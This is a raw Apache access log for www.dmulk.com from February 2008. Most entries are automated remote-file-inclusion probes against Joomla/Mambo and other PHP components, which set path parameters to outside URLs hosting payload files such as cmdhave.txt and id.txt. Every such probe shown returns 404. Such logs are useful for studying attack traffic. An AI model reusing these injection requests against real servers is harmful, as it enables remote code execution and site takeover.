87.230.11.181 - - [21/Feb/2008:05:43:56 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /logs/access_080122.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /logs/access_080122.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:56 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.179.204 - - [21/Feb/2008:05:45:57 -0800] "GET /bikes/GPS/WeSTOC2006/?D=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:45:58 -0800] "GET /logs/access_080130.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:46:01 -0800] "GET /logs/access_080130.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.94 - - [21/Feb/2008:05:46:04 -0800] "GET /logs/access.log HTTP/1.0" 200 102524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:46:49 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:46:49 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:46:49 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:46:50 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:05:46:53 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:05:46:53 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:05:46:54 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.8.154.215 - - [21/Feb/2008:05:46:54 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:05:47:01 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:05:47:01 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:05:47:01 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.169.147.177 - - [21/Feb/2008:05:47:01 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:05:47:34 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:05:47:34 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:05:47:35 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.230.10.213 - - [21/Feb/2008:05:47:36 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:48:19 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:48:19 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:48:20 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:48:21 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:48:21 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:05:48:51 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:05:48:51 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mecad.es/bo?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:05:48:52 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
158.38.0.218 - - [21/Feb/2008:05:48:52 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:49:15 -0800] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:49:16 -0800] "GET /convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:49:17 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.20.57 - - [21/Feb/2008:05:49:22 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.australiada.net/userpics/zwierzeta_motyle/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.20.57 - - [21/Feb/2008:05:49:22 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.australiada.net/userpics/zwierzeta_motyle/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:51:26 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:51:26 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.18.196 - - [21/Feb/2008:05:51:26 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.20.57 - - [21/Feb/2008:05:52:08 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.australiada.net/userpics/zwierzeta_motyle/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:53:14 -0800] "GET /logs/access_080108.log/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:53:14 -0800] "GET /services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:05:53:14 -0800] "GET /logs/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:05:54:39 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.10 - - [21/Feb/2008:05:54:39 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:05:54:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.222.164 - - [21/Feb/2008:05:54:51 -0800] "GET /logs/access_080102.log//modules/coppermine/themes/coppercop.php/themes=http://h1.ripway.com/putr4/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [21/Feb/2008:05:54:51 -0800] "GET //modules/coppermine/themes/coppercop.php/themes=http://h1.ripway.com/putr4/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [21/Feb/2008:05:54:51 -0800] "GET /logs//modules/coppermine/themes/coppercop.php/themes=http://h1.ripway.com/putr4/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:05:59:11 -0800] "GET /logs/access_071224.log//Exchange/include.php?webappcfg[APPPATH]=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [21/Feb/2008:05:59:38 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:00:23 -0800] "GET //main.php?sayfa=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:00:23 -0800] "GET /logs//main.php?sayfa=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:06:02:04 -0800] "GET /logs/access_080126.log/include/Classes.inc.php?tm_includepath=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:06:02:05 -0800] "GET /include/Classes.inc.php?tm_includepath=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:06:02:06 -0800] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:03:45 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:03:45 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:04:00 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:04:00 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
218.189.222.164 - - [21/Feb/2008:06:04:08 -0800] "GET /logs/access_071220.log//modules/coppermine/themes/coppercop.php/themes=http://h1.ripway.com/putr4/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:05:31 -0800] "GET /logs//zipndownload.php?PP_PATH=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:06:05:32 -0800] "GET //zipndownload.php?PP_PATH=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
74.52.27.146 - - [21/Feb/2008:06:05:54 -0800] "GET /index2.php?option=com_jcs§ion=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.52.27.146 - - [21/Feb/2008:06:06:00 -0800] "GET /index2.php?option=com_cropimage§ion=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.52.27.146 - - [21/Feb/2008:06:06:00 -0800] "GET /logs/index2.php?option=com_cropimage§ion=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.30.214.232 - - [21/Feb/2008:06:08:12 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:09:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:09:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:09:28 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:06:10:17 -0800] "GET /index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:06:10:36 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:06:10:37 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:06:10:37 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:11:29 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:11:30 -0800] "GET //skin/zero_vote/error.php?dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:11:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:06:11:48 -0800] "GET /logs/index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:06:11:48 -0800] "GET /index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:25 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:25 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:25 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:29 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:29 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:30 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:33 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:33 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:33 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.136.6.38 - - [21/Feb/2008:06:13:34 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.117 - - [21/Feb/2008:06:13:49 -0800] "GET /retreat1/webcam/?S=D HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:52 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:52 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [21/Feb/2008:06:13:53 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.30.216.97 - - [21/Feb/2008:06:14:41 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.132.12 - - [21/Feb/2008:06:15:27 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:06:15:27 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.5 - - [21/Feb/2008:06:15:27 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:06:15:28 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.13.35.19 - - [21/Feb/2008:06:16:09 -0800] "GET /megumi/Necklace/5_Turquoise_Sterling_Slver_sets_30.JPG HTTP/1.0" 200 2237713 "http://srd.yahoo.co.jp/IMG/r=9/ig=2816x2112/id=c6e521ce18deda46/l=ri/da=g/tid=MMSI02_03/q=%E3%82%81%E3%81%90%E3%81%BF/SIG=12vi6rcud/EXP=1203614112/*-http%3A//www.dmulk.com/megumi/Necklace/5_Turquoise_Sterling_Slver_sets_30.JPG" "Mozilla/4.06 [en] (X11; U; Linux 2.0.27 i586)" "www.dmulk.com"
61.72.254.250 - - [21/Feb/2008:06:16:17 -0800] "GET //login.php?dir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:06:17:33 -0800] "GET /index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.140 - - [21/Feb/2008:06:17:34 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.185.237.140 - - [21/Feb/2008:06:17:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.susjed.com/josso/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:06:18:08 -0800] "GET /logs/access_080103.log/index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
